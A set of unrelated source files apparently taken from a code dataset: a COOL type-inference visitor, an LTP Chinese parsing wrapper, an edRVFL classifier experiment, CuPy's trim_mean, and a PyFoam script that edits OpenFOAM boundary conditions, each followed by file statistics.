def visit(self, node: ast.ProgramNode, scope: Scope = None):
if scope is None:
scope = Scope()
for item in node.declarations:
self.visit(item, scope.create_child())
# print(self.graph, '\n')
self.graph.update_dependencies(default_type=self.context.get_type("Object"))
# print(self.graph, '\n')
InferenceTypeSubstitute(self.context, self.errors).visit(node, scope)
@visitor.when(ast.ClassDeclarationNode)
def visit(self, node: ast.ClassDeclarationNode, scope: Scope):
self.current_type = self.context.get_type(node.id)
attrs = [
feature
for feature in node.features
if isinstance(feature, ast.AttrDeclarationNode)
]
methods = [
feature
for feature in node.features
if isinstance(feature, ast.MethodDeclarationNode)
]
for attr in attrs:
self.visit(attr, scope)
for method in methods:
self.visit(method, scope.create_child())
@visitor.when(ast.AttrDeclarationNode)
def visit(self, node: ast.AttrDeclarationNode, scope: Scope):
# Solve the expression of the attribute
expr_node = (
self.visit(node.expr, scope.create_child())
if node.expr is not None
else None
)
# Define attribute in the scope
var_info = scope.define_variable(node.id, self.context.get_type(node.type))
# Set and get the reference to the variable info node
var_info_node = self.variables[var_info] = VariableInfoNode(
self.context.get_type(node.type), var_info
)
if node.type == "AUTO_TYPE":
# Get the reference to the attribute node
attr_node = self.attributes[self.current_type.name, node.id]
            # If the expression node is not None then two edges are created in the graph
if expr_node is not None:
self.graph.add_edge(expr_node, var_info_node)
self.graph.add_edge(expr_node, attr_node)
# Finally a cycle of two nodes is created between var_info_node and attr_node
self.graph.add_edge(var_info_node, attr_node)
self.graph.add_edge(attr_node, var_info_node)
@visitor.when(ast.MethodDeclarationNode)
def visit(self, node: ast.MethodDeclarationNode, scope: Scope):
self.current_method = self.current_type.get_method(node.id)
# Define 'self' as a variable in the scope
self_var = scope.define_variable("self", self.current_type)
# Set the reference of 'self' variable info node
self.variables[self_var] = VariableInfoNode(self.current_type, self_var)
param_names = self.current_method.param_names
param_types = self.current_method.param_types
for i, (param_name, param_type) in enumerate(zip(param_names, param_types)):
# Define parameter as local variable in current scope
param_var_info = scope.define_variable(param_name, param_type)
# Set the reference to the variable info node
param_var_info_node = self.variables[param_var_info] = VariableInfoNode(
param_type, param_var_info
)
if param_type.name == "AUTO_TYPE":
# Get the parameter node
parameter_node = self.methods[
self.current_type.name, self.current_method.name
][0][i]
# Create the cycle of two nodes between param_var_info_node and parameter_node
self.graph.add_edge(param_var_info_node, parameter_node)
self.graph.add_edge(parameter_node, param_var_info_node)
# Solve the body of the method
body_node = self.visit(node.body, scope)
if self.current_method.return_type.name == "AUTO_TYPE":
# Get the return type node and add an edge body_node -> return_type_node
return_type_node = self.methods[
self.current_type.name, self.current_method.name
][1]
self.graph.add_edge(body_node, return_type_node)
@visitor.when(ast.LetNode)
def visit(self, node: ast.LetNode, scope: Scope):
for _id, _type, _expr in node.declarations:
try:
# Define and get the var_info
var_info = scope.define_variable(_id, self.context.get_type(_type))
except SemanticError:
var_info = scope.define_variable(_id, ErrorType())
var_info_node = self.variables[var_info] = VariableInfoNode(
var_info.type, var_info
)
expr_node = (
self.visit(_expr, scope.create_child()) if _expr is not None else None
)
if var_info.type.name == "AUTO_TYPE":
                # Create an edge or add a new node only if it is AUTO_TYPE
if expr_node is not None:
self.graph.add_edge(expr_node, var_info_node)
if expr_node.type.name == "AUTO_TYPE":
self.graph.add_edge(var_info_node, expr_node)
else:
self.graph.add_node(var_info_node)
elif expr_node is not None and expr_node.type.name == "AUTO_TYPE":
self.graph.add_edge(var_info_node, expr_node)
return self.visit(node.expr, scope.create_child())
@visitor.when(ast.AssignNode)
def visit(self, node: ast.AssignNode, scope: Scope):
var_info = scope.find_variable(node.id)
expr_node = self.visit(node.expr, scope.create_child())
if var_info is not None:
if expr_node.type.name != "AUTO_TYPE" and var_info.type.name == "AUTO_TYPE":
self.graph.add_edge(expr_node, self.variables[var_info])
elif (
var_info.type.name != "AUTO_TYPE" and expr_node.type.name == "AUTO_TYPE"
):
self.graph.add_edge(
AtomNode(self.context.get_type(var_info.type.name)), expr_node
)
elif (
var_info.type.name == "AUTO_TYPE" and expr_node.type.name == "AUTO_TYPE"
):
# Create a cycle
self.graph.add_edge(expr_node, self.variables[var_info])
self.graph.add_edge(self.variables[var_info], expr_node)
else:
pass
return expr_node
@visitor.when(ast.BlockNode)
def visit(self, node: ast.BlockNode, scope: Scope):
child_scope = scope.create_child()
result_node = None
for expr in node.expressions:
result_node = self.visit(expr, child_scope)
return result_node
@visitor.when(ast.ConditionalNode)
def visit(self, node: ast.ConditionalNode, scope: Scope):
if_node = self.visit(node.if_expr, scope)
if not isinstance(if_node, AtomNode):
self.graph.add_edge(AtomNode(self.context.get_type("Bool")), if_node)
then_node = self.visit(node.then_expr, scope.create_child())
else_node = self.visit(node.else_expr, scope.create_child())
if isinstance(then_node, AtomNode) and isinstance(else_node, AtomNode):
return AtomNode(then_node.type.join(else_node.type))
conditional_node = ConditionalNode(
self.context.get_type("AUTO_TYPE"), then_node, else_node
)
if isinstance(then_node, AtomNode) and not isinstance(else_node, AtomNode):
self.graph.add_edge(then_node, else_node)
elif not isinstance(then_node, AtomNode) and isinstance(else_node, AtomNode):
self.graph.add_edge(else_node, then_node)
else:
self.graph.add_edge(then_node, else_node)
self.graph.add_edge(else_node, then_node)
self.graph.add_edge(conditional_node, then_node)
self.graph.add_edge(conditional_node, else_node)
return conditional_node
@visitor.when(ast.WhileNode)
def visit(self, node: ast.WhileNode, scope: Scope):
self.visit(node.condition, scope)
self.visit(node.body, scope.create_child())
return AtomNode(self.context.get_type("Object"))
@visitor.when(ast.SwitchCaseNode)
def visit(self, node: ast.SwitchCaseNode, scope: Scope):
self.visit(node.expr, scope)
defined_nodes = []
not_defined_nodes = []
case_nodes = []
for _id, _type, _expr in node.cases:
new_scope = scope.create_child()
var_info = new_scope.define_variable(_id, self.context.get_type(_type))
self.variables[var_info] = VariableInfoNode(var_info.type, var_info)
case_node = self.visit(_expr, new_scope)
if isinstance(case_node, AtomNode):
defined_nodes.append(case_node)
else:
not_defined_nodes.append(case_node)
case_nodes.append(case_node)
if any(e.type.name == "AUTO_TYPE" for e in case_nodes):
if defined_nodes:
t = Type.multi_join([x.type for x in defined_nodes])
for x in not_defined_nodes:
self.graph.add_edge(AtomNode(t), x)
case_of_node = CaseOfNode(self.context.get_type("AUTO_TYPE"), case_nodes)
self.graph.add_node(case_of_node)
return case_of_node
return AtomNode(Type.multi_join([e.type for e in case_nodes]))
@visitor.when(ast.MethodCallNode)
def visit(self, node: ast.MethodCallNode, scope: Scope):
if node.obj is None:
node.obj = ast.VariableNode("self")
obj_node = self.visit(node.obj, scope)
if isinstance(obj_node, AtomNode) and obj_node.type.contains_method(node.id):
method, owner = obj_node.type.get_method(node.id, get_owner=True)
param_nodes, return_node = self.methods[owner.name, method.name]
for i, arg in enumerate(node.args):
arg_node = self.visit(arg, scope)
if arg_node is None:
# Possible error
continue
if isinstance(arg_node, AtomNode):
if param_nodes[i].type.name == "AUTO_TYPE":
self.graph.add_edge(arg_node, param_nodes[i])
else:
continue
else:
if param_nodes[i].type.name != "AUTO_TYPE":
self.graph.add_edge(param_nodes[i], arg_node)
else:
self.graph.add_edge(param_nodes[i], arg_node)
self.graph.add_edge(arg_node, param_nodes[i])
if return_node.type.name == "AUTO_TYPE":
return return_node
return AtomNode(
return_node.type
if return_node.type.name != "SELF_TYPE"
else obj_node.type
)
for arg in node.args:
self.visit(arg, scope)
return AtomNode(self.context.get_type("Object"))
@visitor.when(ast.IntegerNode)
def visit(self, node: ast.IntegerNode, scope: Scope):
return AtomNode(self.context.get_type("Int"))
@visitor.when(ast.StringNode)
def visit(self, node: ast.StringNode, scope: Scope):
return AtomNode(self.context.get_type("String"))
@visitor.when(ast.BooleanNode)
def visit(self, node: ast.BooleanNode, scope: Scope):
return AtomNode(self.context.get_type("Bool"))
@visitor.when(ast.VariableNode)
def visit(self, node: ast.VariableNode, scope: Scope):
var_info = scope.find_variable(node.lex)
if var_info is not None:
if var_info.type.name == "AUTO_TYPE":
return self.variables[var_info]
else:
return AtomNode(var_info.type)
else:
return None
@visitor.when(ast.InstantiateNode)
def visit(self, node: ast.InstantiateNode, scope: Scope):
if node.lex in self.context.types:
return AtomNode(self.context.get_type(node.lex))
return AtomNode(self.context.get_type("Object"))
@visitor.when(ast.NegationNode)
def visit(self, node: ast.NegationNode, scope: Scope):
self.visit(node.expr, scope)
return AtomNode(self.context.get_type("Bool"))
@visitor.when(ast.ComplementNode)
def visit(self, node: ast.ComplementNode, scope: Scope):
self.visit(node.expr, scope)
return AtomNode(self.context.get_type("Int"))
@visitor.when(ast.IsVoidNode)
def visit(self, node: ast.IsVoidNode, scope: Scope):
self.visit(node.expr, scope)
return AtomNode(self.context.get_type("Bool"))
@visitor.when(ast.PlusNode)
def visit(self, node: ast.PlusNode, scope: Scope):
return self._visit_arithmetic_node(
node, scope, self.context.get_type("Int"), self.context.get_type("Int")
)
@visitor.when(ast.MinusNode)
def visit(self, node: ast.MinusNode, scope: Scope):
return self._visit_arithmetic_node(
node, scope, self.context.get_type("Int"), self.context.get_type("Int")
)
@visitor.when(ast.StarNode)
def visit(self, node: ast.StarNode, scope: Scope):
return self._visit_arithmetic_node(
node, scope, self.context.get_type("Int"), self.context.get_type("Int")
)
@visitor.when(ast.DivNode)
def visit(self, node: ast.DivNode, scope: Scope):
return self._visit_arithmetic_node(
node, scope, self.context.get_type("Int"), self.context.get_type("Int")
)
@visitor.when(ast.LessEqualNode)
def visit(self, node: ast.LessEqualNode, scope: Scope):
return self._visit_arithmetic_node(
node, scope, self.context.get_type("Int"), self.context.get_type("Bool")
)
@visitor.when(ast.LessThanNode)
def visit(self, node: ast.LessThanNode, scope: Scope):
return self._visit_arithmetic_node(
node, scope, self.context.get_type("Int"), self.context.get_type("Bool")
)
@visitor.when(ast.EqualNode)
def visit(self, node: ast.EqualNode, scope: Scope):
self.visit(node.left, scope)
self.visit(node.right, scope)
return AtomNode(self.context.get_type("Bool"))
def _visit_arithmetic_node(
self, node: ast.BinaryNode, scope: Scope, member_types: Type, return_type: Type
):
left = self.visit(node.left, scope)
right = self.visit(node.right, scope)
if not isinstance(left, AtomNode):
self.graph.add_edge(AtomNode(member_types), left)
if not isinstance(right, AtomNode):
self.graph.add_edge(AtomNode(member_types), right)
return AtomNode(return_type)
class InferenceTypeSubstitute:
def __init__(self, context: Context, errors: List[str]):
self.context: Context = context
self.errors: List[str] = errors
self.current_type: Optional[Type] = None
self.current_method: Optional[Method] = None
@visitor.on("node")
def visit(self, node, tabs):
pass
@visitor.when(ast.ProgramNode)
def visit(self, node: ast.ProgramNode, scope: Scope):
for i, elem in enumerate(node.declarations):
self.visit(elem, scope.children[i])
return scope
@visitor.when(ast.ClassDeclarationNode)
def visit(self, node: ast.ClassDeclarationNode, scope: Scope):
self.current_type = self.context.get_type(node.id)
attrs = [
feature
for feature in node.features
if isinstance(feature, ast.AttrDeclarationNode)
]
methods = [
feature
for feature in node.features
if isinstance(feature, ast.MethodDeclarationNode)
]
i = 0
for attr in attrs:
if attr.expr is not None:
attr.index = i
i += 1
self.visit(attr, scope)
for i, method in enumerate(methods, i):
self.visit(method, scope.children[i])
@visitor.when(ast.AttrDeclarationNode)
def visit(self, node: ast.AttrDeclarationNode, scope: Scope):
attr_type = self.context.get_type(node.type)
var_info = scope.find_variable(node.id)
if node.expr is not None:
self.visit(node.expr, scope.children[node.index])
if attr_type == self.context.get_type("AUTO_TYPE"):
if var_info.type == self.context.get_type("AUTO_TYPE"):
self.errors.append(err.INFERENCE_ERROR_ATTRIBUTE % node.id)
node.type = var_info.type.name
@visitor.when(ast.MethodDeclarationNode)
def visit(self, node: ast.MethodDeclarationNode, scope: Scope):
self.current_method = self.current_type.get_method(node.id)
return_type = self.context.get_type(node.return_type)
for i, (name, expr_body_type) in enumerate(node.params):
variable_info = scope.find_variable(name)
if variable_info.type == self.context.get_type("AUTO_TYPE"):
self.errors.append(err.INFERENCE_ERROR_ATTRIBUTE % name)
node.params[i] = (name, variable_info.type.name)
self.visit(node.body, scope)
if return_type == self.context.get_type("AUTO_TYPE"):
if self.current_method.return_type == self.context.get_type("AUTO_TYPE"):
self.errors.append(err.INFERENCE_ERROR_ATTRIBUTE % node.id)
node.return_type = self.current_method.return_type.name
@visitor.when(ast.LetNode)
def visit(self, node: ast.LetNode, scope: Scope):
child_index = 0
for i, (_id, _type, _expr) in enumerate(node.declarations):
variable_info = scope.find_variable(_id)
if _expr is not None:
self.visit(_expr, scope.children[child_index])
child_index += 1
if _type == "AUTO_TYPE":
if variable_info.type == self.context.get_type("AUTO_TYPE"):
self.errors.append(err.INFERENCE_ERROR_ATTRIBUTE % _id)
node.declarations[i] = (_id, variable_info.type.name, _expr)
self.visit(node.expr, scope.children[child_index])
@visitor.when(ast.AssignNode)
def visit(self, node: ast.AssignNode, scope: Scope):
self.visit(node.expr, scope.children[0])
@visitor.when(ast.BlockNode)
def visit(self, node: ast.BlockNode, scope: Scope):
child_scope = scope.children[0]
for _, expr in enumerate(node.expressions):
self.visit(expr, child_scope)
@visitor.when(ast.ConditionalNode)
def visit(self, node: ast.ConditionalNode, scope: Scope):
self.visit(node.if_expr, scope)
self.visit(node.then_expr, scope.children[0])
self.visit(node.else_expr, scope.children[1])
@visitor.when(ast.WhileNode)
def visit(self, node: ast.WhileNode, scope: Scope):
self.visit(node.condition, scope)
self.visit(node.body, scope.children[0])
@visitor.when(ast.SwitchCaseNode)
def visit(self, node: ast.SwitchCaseNode, scope: Scope):
self.visit(node.expr, scope)
for i, (_, _, _expr) in enumerate(node.cases):
self.visit(_expr, scope.children[i])
@visitor.when(ast.MethodCallNode)
def visit(self, node: ast.MethodCallNode, scope: Scope):
self.visit(node.obj, scope)
for arg in node.args:
self.visit(arg, scope)
@visitor.when(ast.AtomicNode)
def visit(self, node: ast.AtomicNode, scope: Scope):
pass
@visitor.when(ast.UnaryNode)
def visit(self, node: ast.UnaryNode, scope: Scope):
self.visit(node.expr, scope)
@visitor.when(ast.BinaryNode)
def visit(self, node: ast.BinaryNode, scope: Scope):
self.visit(node.left, scope)
self.visit(node.right, scope)
| 37.502558 | 118 | 0.608143 | 3,570 | 29,327 | 4.829412 | 0.079272 | 0.027667 | 0.029233 | 0.038977 | 0.570327 | 0.489937 | 0.421669 | 0.389247 | 0.34244 | 0.312511 | 0 | 0.000533 | 0.29645 | 29,327 | 781 | 119 | 37.550576 | 0.83507 | 0.092099 | 0 | 0.376098 | 0 | 0 | 0.02626 | 0.007553 | 0 | 0 | 0 | 0 | 0 | 1 | 0.135325 | false | 0.008787 | 0.012302 | 0.035149 | 0.249561 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b1cc345188ec2513c3e78f2624627d00892d95 | 3,585 | py | Python | sentence_parser.py | hch-NLP/LTP | 4eaba8d33c20127a5cf75e17c6bbcc62574dcfb1 | [
"Apache-2.0"
] | 1 | 2020-11-23T05:04:18.000Z | 2020-11-23T05:04:18.000Z | sentence_parser.py | hch-NLP/LTP | 4eaba8d33c20127a5cf75e17c6bbcc62574dcfb1 | [
"Apache-2.0"
] | null | null | null | sentence_parser.py | hch-NLP/LTP | 4eaba8d33c20127a5cf75e17c6bbcc62574dcfb1 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# coding: utf-8
# File: sentence_parser.py
# Author: HKH<xtuhch@163.com>
# Date: 18-3-10
import os
from pyltp import Segmentor, Postagger, Parser, NamedEntityRecognizer, SementicRoleLabeller
class LtpParser:
def __init__(self):
LTP_DIR = "F:\\LTP\\ltp_data_v3.4.0\\"
self.segmentor = Segmentor()
self.segmentor.load(os.path.join(LTP_DIR, "cws.model"))
self.postagger = Postagger()
self.postagger.load(os.path.join(LTP_DIR, "pos.model"))
self.parser = Parser()
self.parser.load(os.path.join(LTP_DIR, "parser.model"))
self.recognizer = NamedEntityRecognizer()
self.recognizer.load(os.path.join(LTP_DIR, "ner.model"))
self.labeller = SementicRoleLabeller()
self.labeller.load(os.path.join(LTP_DIR, 'pisrl_win.model'))
def release(self):
self.segmentor.release()
self.postagger.release()
self.recognizer.release()
self.parser.release()
self.labeller.release()
    '''Semantic role labeling'''
def format_labelrole(self, words, postags):
arcs = self.parser.parse(words, postags)
roles = self.labeller.label(words, postags, arcs)
roles_dict = {}
for role in roles:
roles_dict[role.index] = {arg.name:[arg.name,arg.range.start, arg.range.end] for arg in role.arguments}
return roles_dict
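    # Hedged shape note (assumed from pyltp's API): roles_dict maps a
    # predicate's word index to {arg_name: [arg_name, start_idx, end_idx]},
    # e.g. {2: {'A0': ['A0', 0, 1], 'A1': ['A1', 3, 5]}}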
    '''Dependency parsing --- maintain, for each word in the sentence, a dict of its syntactic dependent (child) nodes'''
def build_parse_child_dict(self, words, postags, arcs):
child_dict_list = []
format_parse_list = []
for index in range(len(words)):
child_dict = dict()
for arc_index in range(len(arcs)):
                if arcs[arc_index].head == index + 1:  # arc indices start from 1
if arcs[arc_index].relation in child_dict:
child_dict[arcs[arc_index].relation].append(arc_index)
else:
child_dict[arcs[arc_index].relation] = []
child_dict[arcs[arc_index].relation].append(arc_index)
child_dict_list.append(child_dict)
        rely_id = [arc.head for arc in arcs]  # head (parent) node ids
        relation = [arc.relation for arc in arcs]  # dependency relations
        heads = ['Root' if id == 0 else words[id - 1] for id in rely_id]  # words of the head nodes ('Root' for the root)
for i in range(len(words)):
# ['ATT', '李克强', 0, 'nh', '总理', 1, 'n']
a = [relation[i], words[i], i, postags[i], heads[i], rely_id[i]-1, postags[rely_id[i]-1]]
format_parse_list.append(a)
return child_dict_list, format_parse_list
    '''Main parsing entry point'''
def parser_main(self, sentence):
words = list(self.segmentor.segment(sentence))
postags = list(self.postagger.postag(words))
arcs = self.parser.parse(words, postags)
child_dict_list, format_parse_list = self.build_parse_child_dict(words, postags, arcs)
roles_dict = self.format_labelrole(words, postags)
return words, postags, child_dict_list, roles_dict, format_parse_list
if __name__ == '__main__':
parse = LtpParser()
    sentence = '书房里有电脑、有音响。'  # alternative test sentence: 《离开》是由张宇谱曲,演唱。
words, postags, child_dict_list, roles_dict, format_parse_list = parse.parser_main(sentence)
print(words, len(words))
print(postags, len(postags))
print(child_dict_list, len(child_dict_list))
print(roles_dict)
print(format_parse_list, len(format_parse_list))
# for data in format_parse_list:
# if data[0]=='HED':
# print(data[1]) | 42.176471 | 116 | 0.614226 | 453 | 3,585 | 4.660044 | 0.247241 | 0.068214 | 0.063951 | 0.03316 | 0.241118 | 0.217433 | 0.087162 | 0.087162 | 0.087162 | 0.046424 | 0 | 0.008683 | 0.261088 | 3,585 | 85 | 117 | 42.176471 | 0.788222 | 0.075035 | 0 | 0.0625 | 0 | 0 | 0.032667 | 0.008246 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078125 | false | 0 | 0.03125 | 0 | 0.171875 | 0.078125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b280d06a060b8c1fc8e469ded1cb1d139b5bab | 3,338 | py | Python | edRVFL.py | LeslieWongCV/RVFL-Bundle | fe5be77c1555942730f0f5eac4538ffb61042ae2 | [
"MIT"
] | 1 | 2021-10-01T12:24:37.000Z | 2021-10-01T12:24:37.000Z | edRVFL.py | LeslieWongCV/RVFL-Bundle | fe5be77c1555942730f0f5eac4538ffb61042ae2 | [
"MIT"
] | null | null | null | edRVFL.py | LeslieWongCV/RVFL-Bundle | fe5be77c1555942730f0f5eac4538ffb61042ae2 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# @Time : 2021/4/12 12:59 AM
# @Author : Yushuo Wang
# @FileName: main.py
# @Software: PyCharm
# @Blog :https://lesliewongcv.github.io/
import numpy as np
import os
from scipy.io import loadmat
from sklearn.model_selection import KFold
def sigmoid(a, b, x):
return 1.0 / (1 + np.exp(-1.0 * (x.dot(a) + b)))
def edRVFL_prototype(X, T, C, n, L, n_node):
    '''
    Variables: X - input; No. of samples * No. of features (N*n)
               H - H matrix; No. of samples * No. of hidden nodes (N*L)
               T - target; No. of samples * No. of output nodes (N*M)
               C - regularization hyper-parameter
    '''
# init the weight of hidden layers randomly
a_list = []
b_list = []
beta = []
T = one_hot(T)
D = X.copy()
for i in range(layers):
a = np.random.normal(0, 1, (D.shape[1], n_node))
b = np.random.normal(0, 1)
H = sigmoid(a, b, D)
D = np.concatenate((X, H), axis=1) # concatenate with X not D
a_list.append(a)
b_list.append(b)
        # calculate the output weights (beta) for this layer's output
        DD = D.T.dot(D)
        DT = D.T.dot(T)
        if L > n:
            # primal ridge solution: (D^T D + I/C)^{-1} D^T T
            beta += [np.linalg.pinv(DD + np.identity(DD.shape[0]) / C).dot(DT)]
        else:
            # dual ridge solution; the identity must match D.dot(D.T), i.e. N x N
            beta += [D.T.dot(np.linalg.pinv(D.dot(D.T) + np.identity(D.shape[0]) / C)).dot(T)]
Fl = D.dot(beta)
return beta, Fl, a_list, b_list
def one_hot(l):
y = np.zeros([len(l), np.max(l)+1])
for i in range(len(l)):
y[i, l[i]] = 1
return y
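# e.g. one_hot(np.array([0, 2, 1])) ->
#   [[1., 0., 0.],
#    [0., 0., 1.],
#    [0., 1., 0.]]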
def predict(X, BETA, a, b):
D = X.copy()
Y = []
out = np.zeros((len(X), 1))
for i in range(layers):
H = sigmoid(a[i], b[i], D)
D = np.concatenate((X, H), axis=1)
res = D.dot(BETA[i])
Y += [res.argmax(1)]
Y = np.array(Y)
for j in range(len(Y[1])):
out[j] = int(np.argmax(np.bincount(Y[:, j])))
return out
def evaluation(y_hat, goundtruth):
acc = np.sum(np.equal(y_hat, goundtruth) / len(y_hat))
return acc
KFOLD = 4
PATH = '/Users/leslie/Downloads/MatDataset/' # Path to the dataset
folders = os.listdir(PATH)
RES = []
C_list = [1e-3, 1e-2, 1e-1, 1, 1e1, 1e2, 1e3]  # candidate values for the regularization parameter C
layers = 5
progress = 0
for folder_name in folders:
progress += 100 / 29
file_name = folder_name
if folder_name == '.DS_Store':
continue
else:
matfn = PATH + folder_name + '/' + folder_name + '_Train.mat'
df_data = loadmat(matfn)['Data']
df_label = loadmat(matfn)['Label']
        kf = KFold(n_splits=KFOLD, shuffle=False)
for C in C_list:
vali_res = 0
for train_index, test_index in kf.split(df_label): # 4-fold
beta, Fl, A, B = edRVFL_prototype(df_data[train_index], df_label[train_index],
C=C, n=len(df_data[1]), L=len(train_index), n_node=100)
y_valid = predict(df_data[test_index], beta, A, B)
acc_valid = evaluation(y_valid, df_label[test_index])
vali_res += acc_valid
RES += [folder_name + ':' + str(vali_res/4) + ' C = ' + str(C)]
print(str(round(progress)) + "%") # show progress
RES = np.array(RES)
np.savetxt("edRVFL_acc_100_fix.txt", RES, fmt='%s', delimiter=',') | 29.539823 | 104 | 0.546735 | 533 | 3,338 | 3.322702 | 0.318949 | 0.007905 | 0.018634 | 0.022021 | 0.094862 | 0.024845 | 0.024845 | 0.024845 | 0 | 0 | 0 | 0.027566 | 0.293589 | 3,338 | 113 | 105 | 29.539823 | 0.723494 | 0.169263 | 0 | 0.102564 | 0 | 0 | 0.035845 | 0.020849 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064103 | false | 0 | 0.051282 | 0.012821 | 0.179487 | 0.012821 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b30ec451789dd4f884c9cd6403134693729b15 | 2,126 | py | Python | cupyx/scipy/stats/stats.py | prkhrsrvstv1/cupy | ea86c8225b575af9d2855fb77a306cf86fd098ea | [
"MIT"
] | 6,180 | 2016-11-01T14:22:30.000Z | 2022-03-31T08:39:20.000Z | cupyx/scipy/stats/stats.py | prkhrsrvstv1/cupy | ea86c8225b575af9d2855fb77a306cf86fd098ea | [
"MIT"
] | 6,281 | 2016-12-22T07:42:31.000Z | 2022-03-31T19:57:02.000Z | cupyx/scipy/stats/stats.py | prkhrsrvstv1/cupy | ea86c8225b575af9d2855fb77a306cf86fd098ea | [
"MIT"
] | 829 | 2017-02-23T05:46:12.000Z | 2022-03-27T17:40:03.000Z | """
A collection of basic statistical functions for Python.
References
----------
.. [CRCProbStat2000] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
"""
import cupy as cp
def trim_mean(a, proportiontocut, axis=0):
"""Return mean of array after trimming distribution from both tails.
If `proportiontocut` = 0.1, slices off 'leftmost' and 'rightmost' 10% of
scores. The input is sorted before slicing. Slices off less if proportion
results in a non-integer slice index (i.e., conservatively slices off
`proportiontocut` ).
Parameters
----------
a : cupy.ndarray
Input array.
proportiontocut : float
Fraction to cut off of both tails of the distribution.
axis : int or None, optional
Axis along which the trimmed means are computed. Default is 0.
If None, compute over the whole array `a`.
Returns
-------
trim_mean : ndarray
Mean of trimmed array.
See Also
--------
trimboth
tmean : Compute the trimmed mean ignoring values outside given `limits`.
Examples
--------
>>> import cupy as cp
>>> from cupyx.scipy import stats
>>> x = cp.arange(20)
>>> stats.trim_mean(x, 0.1)
array(9.5)
>>> x2 = x.reshape(5, 4)
>>> x2
array([[ 0, 1, 2, 3],
[ 4, 5, 6, 7],
[ 8, 9, 10, 11],
[12, 13, 14, 15],
[16, 17, 18, 19]])
>>> stats.trim_mean(x2, 0.25)
array([ 8., 9., 10., 11.])
>>> stats.trim_mean(x2, 0.25, axis=1)
array([ 1.5, 5.5, 9.5, 13.5, 17.5])
"""
if a.size == 0:
return cp.nan
if axis is None:
a = a.ravel()
axis = 0
nobs = a.shape[axis]
lowercut = int(proportiontocut * nobs)
uppercut = nobs - lowercut
if (lowercut > uppercut):
raise ValueError("Proportion too big.")
atmp = cp.partition(a, (lowercut, uppercut - 1), axis)
sl = [slice(None)] * atmp.ndim
sl[axis] = slice(lowercut, uppercut)
return cp.mean(atmp[tuple(sl)], axis=axis)
| 27.25641 | 77 | 0.583255 | 290 | 2,126 | 4.258621 | 0.489655 | 0.032389 | 0.031579 | 0.022672 | 0.02915 | 0.02915 | 0 | 0 | 0 | 0 | 0 | 0.057441 | 0.279398 | 2,126 | 77 | 78 | 27.61039 | 0.748695 | 0.66698 | 0 | 0 | 0 | 0 | 0.035581 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.0625 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b38b9793dd1017512c203351aeede44a4382ed | 1,949 | py | Python | changeFloodingDirection.py | sosohungry/pyfoam | b19e40a0ef1f41268930122226660414722178e6 | [
"MIT"
] | null | null | null | changeFloodingDirection.py | sosohungry/pyfoam | b19e40a0ef1f41268930122226660414722178e6 | [
"MIT"
] | null | null | null | changeFloodingDirection.py | sosohungry/pyfoam | b19e40a0ef1f41268930122226660414722178e6 | [
"MIT"
] | null | null | null |
from genericpath import exists
from sys import flags
from traceback import walk_tb
from PyFoam.Basics.Utilities import writeDictionaryHeader
from PyFoam.FoamInformation import changeFoamVersion, oldTutorialStructure
from PyFoam.RunDictionary.ParsedParameterFile import ParsedParameterFile
import os
import shutil
from changfile import *
# changeFloodingDirection
# {
# enable true/false;
# inletOld ***;
# outletOld ***;
# inletNew ***;
# outletNew ****;
# inletVelocity ****; //inlet
# inletAlpha *****; //inlet
# ouletPressure ****; //outlet
# contactAngle 45; //wall
# }
def changeFloodDirection(source_path, did_copy):
U = ParsedParameterFile(source_path + "/0/U")
print("the boundary have:")
let = U["boundaryField"]
# for i in range(len(let.keys())):
# print(let[i])
# print(let)
let_it = let.keys()
    for x in let_it:
        print(x, end=" ")
    print()  # end the boundary-name line
    inletOld = input("please input old inlet:")
outletOld = input("please input old outlet:")
inletNew = input("please input new inlet:")
outletNew = input("please input new outlet:")
inletVelocity = input("please input inlet velocity:")
    if did_copy:
target_path = "./FloodDirection " + str(inletOld) + '_' + str(inletNew)
file_copy(source_path, target_path)
change_trans = ParsedParameterFile(target_path + "/0/U")
else:
change_trans = U
    # Boundary entries live under 'boundaryField' in 0/U, so index through it;
    # indexing change_trans[name] at the top level would miss the nested dict.
    bf = change_trans["boundaryField"]
    if inletOld in let_it:
        bf[inletOld]["type"] = "fixedValue"
    if outletOld in let_it:
        bf[outletOld]["type"] = "fixedValue"
    if inletNew in let_it:
        bf[inletNew]["type"] = "inletOutlet"
    if outletNew in let_it:
        bf[outletNew]["type"] = "inletOutlet"
    bf[inletNew]["value"] = inletVelocity
change_trans.writeFile()
